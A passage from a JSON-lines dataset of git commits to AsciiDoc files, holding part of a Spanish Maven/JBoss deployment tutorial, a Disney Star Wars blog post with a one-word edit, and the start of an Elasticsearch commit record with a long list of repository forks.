necesarios y finalmente el comando se ejecuta. Con una sola l\u00ednea de comando hemos llevado a cabo todo el ciclo de construcci\u00f3n del proyecto incluyendo el despliegue de la aplicaci\u00f3n en nuestro reci\u00e9n instalado servidor. A\u00fan con un proyecto tan simple podemos apreciar aqu\u00ed la potencia de Maven. S\u00ed observamos el comando vemos que hemos ejecutado dos phases y un goal. La primera fase, `clean`, elimina cualquier fichero creado en un ciclo de construcci\u00f3n anterior, la segunda ejecuta todas las fases de ciclo por defecto, incluida la fase `install`, que crea una versi\u00f3n snapshot en nuestro repositorio local. Finalmente el goal `deploy` del plugin de Red Hat `jboss-as` toma el artefacto instalable de la carpeta `target\\` dentro de la carpeta del proyecto y lo despliega en el servidor.\n\nAbrimos un navegador y vamos a la direcci\u00f3n `http:\/\/localhost:8080\/jboss-helloworld` y si todo ha ido bien veremos el conocido mensaje `Hello World!`.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig050.png[]\n\n\u00bfY para desinstalar la aplicaci\u00f3n? Otra \u00fanica linea de comando: `mvn jboss-as:undeploy`. Refrescamos la ventana del navegador para ver el error 404 de recurso no disponible. \n\nEl plugin `jboss-as` es capaz de gestionar desde Maven cualquier operaci\u00f3n contra el servidor JBoss. Para usarlo sobre un proyecto como acabamos de hacer s\u00f3lo es necesario declararlo en la secci\u00f3n `<build>` del fichero `pom.xml`. Otra alternativa es incluir el goal de despliegue en la phase final del ciclo por defecto, la fase install, en el fichero pom.xml, y ejecutar entonces el comando mvn clean install, que ahora s\u00f3lo hace referencia a las dos fases. En el fichero pom.xml tendr\u00edamos que tener lo siguiente:\n\n[source,xml]\n----\n<project>\n ...\n <build>\n ...\n <plugins>\n ...\n <plugin>\n <groupId>org.jboss.as.plugins<\/groupId>\n <artifactId>jboss-as-maven-plugin<\/artifactId>\n <version>7.7.Final<\/version>\n <executions>\n <execution>\n <phase>install<\/phase>\n <goals>\n <goal>deploy<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n <\/plugin>\n ...\n <\/plugins>\n ...\n <\/build>\n...\n<\/project>\n----\n\nParamos ahora el servidor de manera manual. Como ha sido iniciado desde una consola de comandos lo que hacemos es cerrarla. Nos vamos a la consola y pulsamos Ctrl + C. Respondemos S si nos pregunta si queremos finalizar el archivo por lotes (el bat) y escribimos exit para que la ventana se cierre.\n\nHagamos ahora lo mismo desde Eclipse. Abrimos Eclipse y aceptamos la carpeta para el espacio de trabajo. No marques el check en esta ventana porque no es infrecuente cambiar la localizaci\u00f3n del workspace.\n\nLo primero que hacemos es asegurarnos de que el JRE que Java va a usar es el contenido en el JDK que ya instalamos y no un JRE p\u00fablico fuera del JDK. Esto es necesario porque Eclipse necesita un JDK como cualquier herrmienta de desarrollo de este tipo y no le basta con un JRE o m\u00e1quina virtual de Java. Me voy a Windows > Preferences > Java > Installed JREs y si el JRE no es el incluido en el JDK lo borramos, a\u00f1adimos el incluido en el JDK y lo marcamos como JRE por defecto.\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"471855cf226f8ef22987259c3e67fcf961779367","subject":"Update 2016-02-19-Star-Wars-Stage-Show-and-New-Fireworks-coming-to-Hollywood-Studios.adoc","message":"Update 2016-02-19-Star-Wars-Stage-Show-and-New-Fireworks-coming-to-Hollywood-Studios.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-02-19-Star-Wars-Stage-Show-and-New-Fireworks-coming-to-Hollywood-Studios.adoc","new_file":"_posts\/2016-02-19-Star-Wars-Stage-Show-and-New-Fireworks-coming-to-Hollywood-Studios.adoc","new_contents":"= Star Wars Stage Show and New Fireworks coming to Hollywood Studios\n:hp-tags: Disney World, Hollywood Studios, Star Wars\n:published_at: 2016-02-19\n\nThere's been an awakening. Have you felt it?\n\nDisney's Hollywood Studios is about to awaken with all new Star Wars experiences! The https:\/\/disneyparks.disney.go.com\/blog\/2016\/02\/new-star-wars-nighttime-spectacular-announced-set-to-make-theme-park-history\/[Disney Parks Blog] is reporting that starting April 4th, a new Star Wars stage show named \"_Star Wars: A Galaxy Far, Far Away_\" will debut at center stage in Disney's Hollywood Studios. That same day, Captain Phasma (from _The Force Awakens_) will lead several First Order stormtroopers on a march from the Star Wars Launch Bay to center stage.\n\nThen later this summer, a new Star Wars fireworks show, \"_Star Wars: A Galactic Spectacular_\" will be shown nightly, combining fireworks, special effects, and video projection on the Chinese Theater. The show will include a tower of fire and spotlight beams that form lightsabers in the sky.\n\nHaving seen the amazing Star Wars-themed \"_Symphony in the Stars_\", both at Star Wars Weekends and the newer incarnation of the show that debuted in December, I can only imagine that the new show will be nothing short of jaw-dropping. And having seen the Star Wars segment of _World of Color_ in Disney California Adventure, I imagine the tower of fire being much like the huge fireballs shot during that show. This should be incredible!\n\nWhat do you think of all of the Star Wars experiences that Disney is offering in Disney's Hollywood Studios in advance of the new Star Wars Land to be opened in a few years? Leave a comment and let's discuss!","old_contents":"= Star Wars Stage Show and New Fireworks coming to Hollywood Studios\n:hp-tags: Disney World, Hollywood Studios, Star Wars\n:published_at: 2016-02-19\n\nThere's been an awakening. Have you felt it?\n\nDisney's Hollywood Studios is about to awaken with all new Star Wars experiences! The https:\/\/disneyparks.disney.go.com\/blog\/2016\/02\/new-star-wars-nighttime-spectacular-announced-set-to-make-theme-park-history\/[Disney Parks Blog] is reporting that starting April 4th, a new Star Wars stage show named \"_Star Wars: A Galaxy Far, Far Away_\" will debut at center stage in Disney's Hollywood Studios. That same day, Captain Phasma (from _The Force Awakens_) will lead several First Order stormtroopers on a march from the Star Wars Launch Bay to center stage.\n\nThen later this summer, a new Star Wars fireworks show, \"_Star Wars: A Galactic Spectacular_\" will be shown nightly, combining fireworks, special effects, and video projection on the Chinese Theater. The show will include a tower of fire and spotlight beams that form lightsabers in the sky.\n\nHaving seen the amazing Star Wars-themed \"_Symphony in the Stars_\", both at Star Wars Weekends and the newer incarnation of the show that debuted in December, I can only imagine that the new show will be nothing short of jaw-dropping. And having seen the Star Wars segment of _World of Color_ in Disney California Adventure, I imagine the tower of fire being much like the huge fireballs shot during that show. This should be awesome!\n\nWhat do you think of all of the Star Wars experiences that Disney is offering in Disney's Hollywood Studios in advance of the new Star Wars Land to be opened in a few years? Leave a comment and let's discuss!","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"6fadeeca566b07b86f1de26f449fab6a96541037","subject":"Updated doc annotations for 1.4.3","message":"Updated doc annotations for 1.4.3\n","repos":"Helen-Zhao\/elasticsearch,pritishppai\/elasticsearch,jprante\/elasticsearch,infusionsoft\/elasticsearch,LeoYao\/elasticsearch,mortonsykes\/elasticsearch,kunallimaye\/elasticsearch,kalimatas\/elasticsearch,cnfire\/elasticsearch-1,franklanganke\/elasticsearch,linglaiyao1314\/elasticsearch,truemped\/elasticsearch,jchampion\/elasticsearch,Rygbee\/elasticsearch,jw0201\/elastic,GlenRSmith\/elasticsearch,JSCooke\/elasticsearch,hanswang\/elasticsearch,humandb\/elasticsearch,jpountz\/elasticsearch,javachengwc\/elasticsearch,pranavraman\/elasticsearch,kenshin233\/elasticsearch,Shekharrajak\/elasticsearch,vingupta3\/elasticsearch,camilojd\/elasticsearch,PhaedrusTheGreek\/elasticsearch,rmuir\/elasticsearch,bestwpw\/elasticsearch,sreeramjayan\/elasticsearch,wayeast\/elasticsearch,s1monw\/elasticsearch,wittyameta\/elasticsearch,winstonewert\/elasticsearch,StefanGor\/elasticsearch,yongminxia\/elasticsearch,JSCooke\/elasticsearch,chirilo\/elasticsearch,nrkkalyan\/elasticsearch,schonfeld\/elasticsearch,acchen97\/elasticsearch,petabytedata\/elasticsearch,vietlq\/elasticsearch,himanshuag\/elasticsearch,PhaedrusTheGreek\/elasticsearch,sreeramjayan\/elasticsearch,alexbrasetvik\/elasticsearch,Flipkart\/elasticsearch,slavau\/elasticsearch,MichaelLiZhou\/elasticsearch,kevinkluge\/elasticsearch,Ansh90\/elasticsearch,tsohil\/elasticsearch,Rygbee\/elasticsearch,fernandozhu\/elasticsearch,lightslife\/elasticsearch,mikemccand\/elasticsearch,hechunwen\/elasticsearch,truemped\/elasticsearch,kcompher\/elasticsearch,JSCooke\/elasticsearch,s1monw\/elasticsearch,apepper\/elasticsearch,wittyameta\/elasticsearch,polyfractal\/elasticsearch,djschny\/elasticsearch,yongminxia\/elasticsearch,luiseduardohdbackup\/elasticsearch,mmaracic\/elasticsearch,Kakakakakku\/elasticsearch,andrestc\/elasticsearch,wbowling\/elasticsearch,sreeramjayan\/elasticsearch,EasonYi\/elasticsearch,davidvgalbraith\/elasticsearch,YosuaMichael\/elasticsearch,qwerty4030\/elasticsearch,mbrukman\/elasticsearch,franklanganke\/elasticsearch,xingguang2013\/elasticsearch,rlugojr\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,acchen97\/elasticsearch,MjAbuz\/elasticsearch,pranavraman\/elasticsearch,khiraiwa\/elasticsearch,likaiwalkman\/elasticsearch,dongjoon-hyun\/elasticsearch,easonC\/elasticsearch,jw0201\/elastic,vvcephei\/elasticsearch,wayeast\/elasticsearch,masterweb121\/elasticsearch,jbertouch\/elasticsearch,slavau\/elasticsearch,LeoYao\/elasticsearch,gmarz\/elasticsearch,knight1128\/elasticsearch,mjason3\/elasticsearch,ESamir\/elasticsearch,clintongormley\/elasticsearch,nilabhsagar\/elasticsearch,iacdingping\/elasticsearch,NBSW\/elasticsearch,JackyMai\/elasticsearch,hydro2k\/elasticsearch,dataduke\/elasticsearch,jimczi\/elasticsearch,qwerty4030\/elasticsearch,MetSystem\/elasticsearch,strapdata\/elassandra-test,dylan8902\/elasticsearch,AndreKR\/elasticsearch,easonC\/elasticsearch,Charlesdong\/elasticsearch,JackyMai\/elasticsearch,caengcjd\/elasticsearch,wayeast\/elasticsearch,tahaemin\/elasticsearch,Kakakakakku\/elasticsearch,Brijeshrpatel9\/elasticsearch,huanzhong\/elasticsearch,zhiqinghuang\/elasticsearch,sc0ttkclark\/elasticsearch,sdauletau\/elasticsearch,kevinkluge\/elasticsearch,mikemccand\/elasticsearch,socialrank\/elasticsearch,huanzhong\/elasticsearch,hydro2k\/elasticsearch,winstonewert\/elasticsearch,Brijeshrpatel9\/elasticsearch,jimhooker2002\/elasticsearch,hafkensite\/elasticsearch,girirajsharma\/elasticsearch,xingguang2013\/elasticsearch,onegambler\/elasticsearch,dylan8902\/elasticsearch,C-Bish\/elasticsearch,pranavraman\/elasticsearch,diendt\/elasticsearch,HarishAtGitHub\/elasticsearch,ESamir\/elasticsearch,Uiho\/elasticsearch,IanvsPoplicola\/elasticsearch,JervyShi\/elasticsearch,fekaputra\/elasticsearch,jeteve\/elasticsearch,apepper\/elasticsearch,rhoml\/elasticsearch,lchennup\/elasticsearch,strapdata\/elassandra,szroland\/elasticsearch,i-am-Nathan\/elasticsearch,iacdingping\/elasticsearch,wangtuo\/elasticsearch,awislowski\/elasticsearch,obourgain\/elasticsearch,JackyMai\/elasticsearch,bawse\/elasticsearch,MetSystem\/elasticsearch,achow\/elasticsearch,IanvsPoplicola\/elasticsearch,gingerwizard\/elasticsearch,wittyameta\/elasticsearch,aglne\/elasticsearch,sc0ttkclark\/elasticsearch,MjAbuz\/elasticsearch,Shepard1212\/elasticsearch,huanzhong\/elasticsearch,ThalaivaStars\/OrgRepo1,xpandan\/elasticsearch,coding0011\/elasticsearch,nomoa\/elasticsearch,jw0201\/elastic,javachengwc\/elasticsearch,sauravmondallive\/elasticsearch,vroyer\/elasticassandra,Helen-Zhao\/elasticsearch,mgalushka\/elasticsearch,zhiqinghuang\/elasticsearch,HarishAtGitHub\/elasticsearch,IanvsPoplicola\/elasticsearch,kevinkluge\/elasticsearch,andrejserafim\/elasticsearch,truemped\/elasticsearch,s1monw\/elasticsearch,amaliujia\/elasticsearch,nellicus\/elasticsearch,yanjunh\/elasticsearch,SergVro\/elasticsearch,strapdata\/elassandra5-rc,scottsom\/elasticsearch,alexkuk\/elasticsearch,jimhooker2002\/elasticsearch,MetSystem\/elasticsearch,wbowling\/elasticsearch,nazarewk\/elasticsearch,Collaborne\/elasticsearch,koxa29\/elasticsearch,elancom\/elasticsearch,javachengwc\/elasticsearch,skearns64\/elasticsearch,mapr\/elasticsearch,diendt\/elasticsearch,franklanganke\/elasticsearch,ivansun1010\/elasticsearch,chirilo\/elasticsearch,chirilo\/elasticsearch,slavau\/elasticsearch,dylan8902\/elasticsearch,alexshadow007\/elasticsearch,davidvgalbraith\/elasticsearch,Brijeshrpatel9\/elasticsearch,nellicus\/elasticsearch,rento19962\/elasticsearch,jeteve\/elasticsearch,nezirus\/elasticsearch,btiernay\/elasticsearch,achow\/elasticsearch,vrkansagara\/elasticsearch,socialrank\/elasticsearch,sjohnr\/elasticsearch,karthikjaps\/elasticsearch,nilabhsagar\/elasticsearch,mnylen\/elasticsearch,ivansun1010\/elasticsearch,szroland\/elasticsearch,MichaelLiZhou\/elasticsearch,jaynblue\/elasticsearch,schonfeld\/elasticsearch,markharwood\/elasticsearch,Chhunlong\/elasticsearch,IanvsPoplicola\/elasticsearch,codebunt\/elasticsearch,codebunt\/elasticsearch,Chhunlong\/elasticsearch,rento19962\/elasticsearch,Shepard1212\/elasticsearch,golubev\/elasticsearch,linglaiyao1314\/elasticsearch,dpursehouse\/elasticsearch,areek\/elasticsearch,sreeramjayan\/elasticsearch,likaiwalkman\/elasticsearch,kimimj\/elasticsearch,brandonkearby\/elasticsearch,MaineC\/elasticsearch,codebunt\/elasticsearch,andrejserafim\/elasticsearch,palecur\/elasticsearch,mnylen\/elasticsearch,xingguang2013\/elasticsearch,kaneshin\/elasticsearch,sarwarbhuiyan\/elasticsearch,schonfeld\/elasticsearch,beiske\/elasticsearch,Flipkart\/elasticsearch,AshishThakur\/elasticsearch,mgalushka\/elasticsearch,polyfractal\/elasticsearch,kenshin233\/elasticsearch,sposam\/elasticsearch,petabytedata\/elasticsearch,F0lha\/elasticsearch,btiernay\/elasticsearch,queirozfcom\/elasticsearch,mute\/elasticsearch,EasonYi\/elasticsearch,dongjoon-hyun\/elasticsearch,mute\/elasticsearch,martinstuga\/elasticsearch,sjohnr\/elasticsearch,KimTaehee\/elasticsearch,polyfractal\/elasticsearch,alexkuk\/elasticsearch,huanzhong\/elasticsearch,sdauletau\/elasticsearch,Widen\/elasticsearch,xpandan\/elasticsearch,glefloch\/elasticsearch,mjhennig\/elasticsearch,martinstuga\/elasticsearch,TonyChai24\/ESSource,cnfire\/elasticsearch-1,sreeramjayan\/elasticsearch,Rygbee\/elasticsearch,lightslife\/elasticsearch,gfyoung\/elasticsearch,vvcephei\/elasticsearch,himanshuag\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,Liziyao\/elasticsearch,sc0ttkclark\/elasticsearch,tkssharma\/elasticsearch,tsohil\/elasticsearch,amit-shar\/elasticsearch,wimvds\/elasticsearch,luiseduardohdbackup\/elasticsearch,kubum\/elasticsearch,wimvds\/elasticsearch,polyfractal\/elasticsearch,smflorentino\/elasticsearch,girirajsharma\/elasticsearch,rento19962\/elasticsearch,sjohnr\/elasticsearch,amaliujia\/elasticsearch,Fsero\/elasticsearch,ydsakyclguozi\/elasticsearch,yongminxia\/elasticsearch,kunallimaye\/elasticsearch,gmarz\/elasticsearch,jprante\/elasticsearch,liweinan0423\/elasticsearch,a2lin\/elasticsearch,kaneshin\/elasticsearch,yanjunh\/elasticsearch,rajanm\/elasticsearch,LeoYao\/elasticsearch,sdauletau\/elasticsearch,Liziyao\/elasticsearch,vietlq\/elasticsearch,btiernay\/elasticsearch,glefloch\/elasticsearch,obourgain\/elasticsearch,MaineC\/elasticsearch,hanswang\/elasticsearch,achow\/elasticsearch,myelin\/elasticsearch,gmarz\/elasticsearch,strapdata\/elassandra,queirozfcom\/elasticsearch,huypx1292\/elasticsearch,ckclark\/elasticsearch,rmuir\/elasticsearch,phani546\/elasticsearch,vingupta3\/elasticsearch,mjason3\/elasticsearch,linglaiyao1314\/elasticsearch,pritishppai\/elasticsearch,cnfire\/elasticsearch-1,fernandozhu\/elasticsearch,franklanganke\/elasticsearch,bestwpw\/elasticsearch,mohit\/elasticsearch,pranavraman\/elasticsearch,feiqitian\/elasticsearch,scottsom\/elasticsearch,glefloch\/elasticsearch,Siddartha07\/elasticsearch,golubev\/elasticsearch,MjAbuz\/elasticsearch,kimimj\/elasticsearch,linglaiyao1314\/elasticsearch,sdauletau\/elasticsearch,andrestc\/elasticsearch,mortonsykes\/elasticsearch,lzo\/elasticsearch-1,springning\/elasticsearch,mgalushka\/elasticsearch,schonfeld\/elasticsearch,hanswang\/elasticsearch,yynil\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,jsgao0\/elasticsearch,ESamir\/elasticsearch,Liziyao\/elasticsearch,zkidkid\/elasticsearch,markharwood\/elasticsearch,sjohnr\/elasticsearch,fekaputra\/elasticsearch,sneivandt\/elasticsearch,btiernay\/elasticsearch,kkirsche\/elasticsearch,hechunwen\/elasticsearch,kaneshin\/elasticsearch,mbrukman\/elasticsearch,wittyameta\/elasticsearch,TonyChai24\/ESSource,drewr\/elasticsearch,bestwpw\/elasticsearch,queirozfcom\/elasticsearch,lchennup\/elasticsearch,fekaputra\/elasticsearch,hafkensite\/elasticsearch,rmuir\/elasticsearch,vroyer\/elassandra,yynil\/elasticsearch,ricardocerq\/elasticsearch,ImpressTV\/elasticsearch,kcompher\/elasticsearch,strapdata\/elassandra-test,yynil\/elasticsearch,Asimov4\/elasticsearch,wenpos\/elasticsearch,kalimatas\/elasticsearch,Clairebi\/ElasticsearchClone,JervyShi\/elasticsearch,wangyuxue\/elasticsearch,Shekharrajak\/elasticsearch,linglaiyao1314\/elasticsearch,thecocce\/elasticsearch,ydsakyclguozi\/elasticsearch,tahaemin\/elasticsearch,mrorii\/elasticsearch,camilojd\/elasticsearch,masaruh\/elasticsearch,iacdingping\/elasticsearch,ckclark\/elasticsearch,ImpressTV\/elasticsearch,rhoml\/elasticsearch,luiseduardohdbackup\/elasticsearch,zeroctu\/elasticsearch,kaneshin\/elasticsearch,sposam\/elasticsearch,knight1128\/elasticsearch,wenpos\/elasticsearch,adrianbk\/elasticsearch,nilabhsagar\/elasticsearch,F0lha\/elasticsearch,yongminxia\/elasticsearch,pritishppai\/elasticsearch,kubum\/elasticsearch,alexbrasetvik\/elasticsearch,ThalaivaStars\/OrgRepo1,clintongormley\/elasticsearch,karthikjaps\/elasticsearch,adrianbk\/elasticsearch,lmtwga\/elasticsearch,kaneshin\/elasticsearch,alexbrasetvik\/elasticsearch,umeshdangat\/elasticsearch,hanst\/elasticsearch,alexkuk\/elasticsearch,dataduke\/elasticsearch,a2lin\/elasticsearch,SergVro\/elasticsearch,sauravmondallive\/elasticsearch,szroland\/elasticsearch,brandonkearby\/elasticsearch,wayeast\/elasticsearch,mjhennig\/elasticsearch,yynil\/elasticsearch,Fsero\/elasticsearch,fforbeck\/elasticsearch,likaiwalkman\/elasticsearch,lks21c\/elasticsearch,sposam\/elasticsearch,fooljohnny\/elasticsearch,elasticdog\/elasticsearch,liweinan0423\/elasticsearch,vingupta3\/elasticsearch,mmaracic\/elasticsearch,Fsero\/elasticsearch,mkis-\/elasticsearch,drewr\/elasticsearch,amit-shar\/elasticsearch,chirilo\/elasticsearch,huypx1292\/elasticsearch,elancom\/elasticsearch,mjhennig\/elasticsearch,18098924759\/elasticsearch,kimimj\/elasticsearch,hanst\/elasticsearch,scorpionvicky\/elasticsearch,kingaj\/elasticsearch,dataduke\/elasticsearch,nezirus\/elasticsearch,njlawton\/elasticsearch,lightslife\/elasticsearch,hanswang\/elasticsearch,nazarewk\/elasticsearch,umeshdangat\/elasticsearch,strapdata\/elassandra-test,C-Bish\/elasticsearch,kalimatas\/elasticsearch,Asimov4\/elasticsearch,MichaelLiZhou\/elasticsearch,xuzha\/elasticsearch,Siddartha07\/elasticsearch,caengcjd\/elasticsearch,camilojd\/elasticsearch,ivansun1010\/elasticsearch,Siddartha07\/elasticsearch,artnowo\/elasticsearch,camilojd\/elasticsearch,davidvgalbraith\/elasticsearch,AshishThakur\/elasticsearch,PhaedrusTheGreek\/elasticsearch,himanshuag\/elasticsearch,iantruslove\/elasticsearch,karthikjaps\/elasticsearch,lydonchandra\/elasticsearch,areek\/elasticsearch,lydonchandra\/elasticsearch,pablocastro\/elasticsearch,socialrank\/elasticsearch,Liziyao\/elasticsearch,C-Bish\/elasticsearch,jsgao0\/elasticsearch,bestwpw\/elasticsearch,polyfractal\/elasticsearch,geidies\/elasticsearch,dylan8902\/elasticsearch,AndreKR\/elasticsearch,jeteve\/elasticsearch,iamjakob\/elasticsearch,ImpressTV\/elasticsearch,Helen-Zhao\/elasticsearch,wenpos\/elasticsearch,trangvh\/elasticsearch,lks21c\/elasticsearch,jchampion\/elasticsearch,karthikjaps\/elasticsearch,socialrank\/elasticsearch,andrestc\/elasticsearch,abibell\/elasticsearch,gfyoung\/elasticsearch,jbertouch\/elasticsearch,humandb\/elasticsearch,tkssharma\/elasticsearch,jango2015\/elasticsearch,anti-social\/elasticsearch,tsohil\/elasticsearch,weipinghe\/elasticsearch,MetSystem\/elasticsearch,vrkansagara\/elasticsearch,gingerwizard\/elasticsearch,ZTE-PaaS\/elasticsearch,smflorentino\/elasticsearch,onegambler\/elasticsearch,sposam\/elasticsearch,snikch\/elasticsearch,brandonkearby\/elasticsearch,lks21c\/elasticsearch,hafkensite\/elasticsearch,dataduke\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,palecur\/elasticsearch,kubum\/elasticsearch,wittyameta\/elasticsearch,tkssharma\/elasticsearch,NBSW\/elasticsearch,sposam\/elasticsearch,lchennup\/elasticsearch,snikch\/elasticsearch,Chhunlong\/elasticsearch,strapdata\/elassandra5-rc,martinstuga\/elasticsearch,lzo\/elasticsearch-1,sneivandt\/elasticsearch,zkidkid\/elasticsearch,bestwpw\/elasticsearch,JervyShi\/elasticsearch,ouyangkongtong\/elasticsearch,Shekharrajak\/elasticsearch,umeshdangat\/elasticsearch,rento19962\/elasticsearch,StefanGor\/elasticsearch,bawse\/elasticsearch,nknize\/elasticsearch,tkssharma\/elasticsearch,ZTE-PaaS\/elasticsearch,lzo\/elasticsearch-1,EasonYi\/elasticsearch,Shekharrajak\/elasticsearch,zeroctu\/elasticsearch,uschindler\/elasticsearch,sposam\/elasticsearch,schonfeld\/elasticsearch,polyfractal\/elasticsearch,infusionsoft\/elasticsearch,thecocce\/elasticsearch,shreejay\/elasticsearch,wayeast\/elasticsearch,spiegela\/elasticsearch,TonyChai24\/ESSource,ckclark\/elasticsearch,zeroctu\/elasticsearch,hirdesh2008\/elasticsearch,nknize\/elasticsearch,zeroctu\/elasticsearch,franklanganke\/elasticsearch,springning\/elasticsearch,rento19962\/elasticsearch,jango2015\/elasticsearch,easonC\/elasticsearch,kcompher\/elasticsearch,iantruslove\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,alexkuk\/elasticsearch,NBSW\/elasticsearch,alexkuk\/elasticsearch,jimhooker2002\/elasticsearch,elancom\/elasticsearch,masaruh\/elasticsearch,Asimov4\/elasticsearch,weipinghe\/elasticsearch,mrorii\/elasticsearch,elasticdog\/elasticsearch,kalburgimanjunath\/elasticsearch,kkirsche\/elasticsearch,EasonYi\/elasticsearch,rajanm\/elasticsearch,markllama\/elasticsearch,mjhennig\/elasticsearch,wenpos\/elasticsearch,yongminxia\/elasticsearch,abibell\/elasticsearch,milodky\/elasticsearch,rajanm\/elasticsearch,rmuir\/elasticsearch,koxa29\/elasticsearch,Shekharrajak\/elasticsearch,mohit\/elasticsearch,fred84\/elasticsearch,ThalaivaStars\/OrgRepo1,socialrank\/elasticsearch,fernandozhu\/elasticsearch,LeoYao\/elasticsearch,adrianbk\/elasticsearch,Ansh90\/elasticsearch,ydsakyclguozi\/elasticsearch,mgalushka\/elasticsearch,jsgao0\/elasticsearch,hydro2k\/elasticsearch,MaineC\/elasticsearch,Kakakakakku\/elasticsearch,mjhennig\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,YosuaMichael\/elasticsearch,lightslife\/elasticsearch,kalimatas\/elasticsearch,vingupta3\/elasticsearch,kimimj\/elasticsearch,mute\/elasticsearch,YosuaMichael\/elasticsearch,hanswang\/elasticsearch,kubum\/elasticsearch,nellicus\/elasticsearch,MaineC\/elasticsearch,abibell\/elasticsearch,markllama\/elasticsearch,elasticdog\/elasticsearch,myelin\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,mcku\/elasticsearch,wenpos\/elasticsearch,hanswang\/elasticsearch,lks21c\/elasticsearch,Siddartha07\/elasticsearch,petabytedata\/elasticsearch,mgalushka\/elasticsearch,a2lin\/elasticsearch,vietlq\/elasticsearch,feiqitian\/elasticsearch,javachengwc\/elasticsearch,Rygbee\/elasticsearch,robin13\/elasticsearch,KimTaehee\/elasticsearch,hafkensite\/elasticsearch,kalburgimanjunath\/elasticsearch,diendt\/elasticsearch,snikch\/elasticsearch,fforbeck\/elasticsearch,MisterAndersen\/elasticsearch,mkis-\/elasticsearch,Flipkart\/elasticsearch,NBSW\/elasticsearch,EasonYi\/elasticsearch,markwalkom\/elasticsearch,himanshuag\/elasticsearch,pranavraman\/elasticsearch,likaiwalkman\/elasticsearch,vietlq\/elasticsearch,zhiqinghuang\/elasticsearch,dataduke\/elasticsearch,wimvds\/elasticsearch,Widen\/elasticsearch,loconsolutions\/elasticsearch,lydonchandra\/elasticsearch,fekaputra\/elasticsearch,coding0011\/elasticsearch,vroyer\/elassandra,uschindler\/elasticsearch,sauravmondallive\/elasticsearch,yynil\/elasticsearch,davidvgalbraith\/elasticsearch,ImpressTV\/elasticsearch,vvcephei\/elasticsearch,Ansh90\/elasticsearch,masterweb121\/elasticsearch,amit-shar\/elasticsearch,smflorentino\/elasticsearch,LewayneNaidoo\/elasticsearch,weipinghe\/elasticsearch,tebriel\/elasticsearch,episerver\/elasticsearch,mjason3\/elasticsearch,jpountz\/elasticsearch,dpursehouse\/elasticsearch,smflorentino\/elasticsearch,pablocastro\/elasticsearch,Kakakakakku\/elasticsearch,MichaelLiZhou\/elasticsearch,qwerty4030\/elasticsearch,nilabhsagar\/elasticsearch,jbertouch\/elasticsearch,ulkas\/elasticsearch,a2lin\/elasticsearch,Charlesdong\/elasticsearch,infusionsoft\/elasticsearch,coding0011\/elasticsearch,jeteve\/elasticsearch,EasonYi\/elasticsearch,rmuir\/elasticsearch,ImpressTV\/elasticsearch,liweinan0423\/elasticsearch,kenshin233\/elasticsearch,knight1128\/elasticsearch,zkidkid\/elasticsearch,himanshuag\/elasticsearch,weipinghe\/elasticsearch,xingguang2013\/elasticsearch,diendt\/elasticsearch,himanshuag\/elasticsearch,SergVro\/elasticsearch,wuranbo\/elasticsearch,ricardocerq\/elasticsearch,xpandan\/elasticsearch,naveenhooda2000\/elasticsearch,pritishppai\/elasticsearch,yanjunh\/elasticsearch,beiske\/elasticsearch,ricardocerq\/elasticsearch,kevinkluge\/elasticsearch,18098924759\/elasticsearch,gfyoung\/elasticsearch,jango2015\/elasticsearch,jw0201\/elastic,elasticdog\/elasticsearch,yanjunh\/elasticsearch,lmtwga\/elasticsearch,easonC\/elasticsearch,feiqitian\/elasticsearch,onegambler\/elasticsearch,jbertouch\/elasticsearch,jango2015\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,yuy168\/elasticsearch,Widen\/elasticsearch,jbertouch\/elasticsearch,lmtwga\/elasticsearch,yuy168\/elasticsearch,xpandan\/elasticsearch,kkirsche\/elasticsearch,acchen97\/elasticsearch,overcome\/elasticsearch,mapr\/elasticsearch,ckclark\/elasticsearch,weipinghe\/elasticsearch,socialrank\/elasticsearch,HarishAtGitHub\/elasticsearch,bawse\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,mapr\/elasticsearch,petabytedata\/elasticsearch,jango2015\/elasticsearch,adrianbk\/elasticsearch,iamjakob\/elasticsearch,iacdingping\/elasticsearch,loconsolutions\/elasticsearch,mnylen\/elasticsearch,kevinkluge\/elasticsearch,pritishppai\/elasticsearch,sarwarbhuiyan\/elasticsearch,drewr\/elasticsearch,wittyameta\/elasticsearch,NBSW\/elasticsearch,strapdata\/elassandra-test,shreejay\/elasticsearch,StefanGor\/elasticsearch,brandonkearby\/elasticsearch,Fsero\/elasticsearch,strapdata\/elassandra-test,iacdingping\/elasticsearch,springning\/elasticsearch,knight1128\/elasticsearch,HarishAtGitHub\/elasticsearch,rhoml\/elasticsearch,huanzhong\/elasticsearch,palecur\/elasticsearch,ckclark\/elasticsearch,thecocce\/elasticsearch,iantruslove\/elasticsearch,cnfire\/elasticsearch-1,jchampion\/elasticsearch,hafkensite\/elasticsearch,mmaracic\/elasticsearch,spiegela\/elasticsearch,scottsom\/elasticsearch,mortonsykes\/elasticsearch,kubum\/elasticsearch,ThalaivaStars\/OrgRepo1,scorpionvicky\/elasticsearch,lmtwga\/elasticsearch,ZTE-PaaS\/elasticsearch,episerver\/elasticsearch,PhaedrusTheGreek\/elasticsearch,aglne\/elasticsearch,strapdata\/elassandra-test,Flipkart\/elasticsearch,girirajsharma\/elasticsearch,iantruslove\/elasticsearch,KimTaehee\/elasticsearch,easonC\/elasticsearch,sjohnr\/elasticsearch,codebunt\/elasticsearch,henakamaMSFT\/elasticsearch,drewr\/elasticsearch,AshishThakur\/elasticsearch,F0lha\/elasticsearch,sjohnr\/elasticsearch,phani546\/elasticsearch,nomoa\/elasticsearch,markwalkom\/elasticsearch,cwurm\/elasticsearch,sc0ttkclark\/elasticsearch,Siddartha07\/elasticsearch,nknize\/elasticsearch,markharwood\/elastics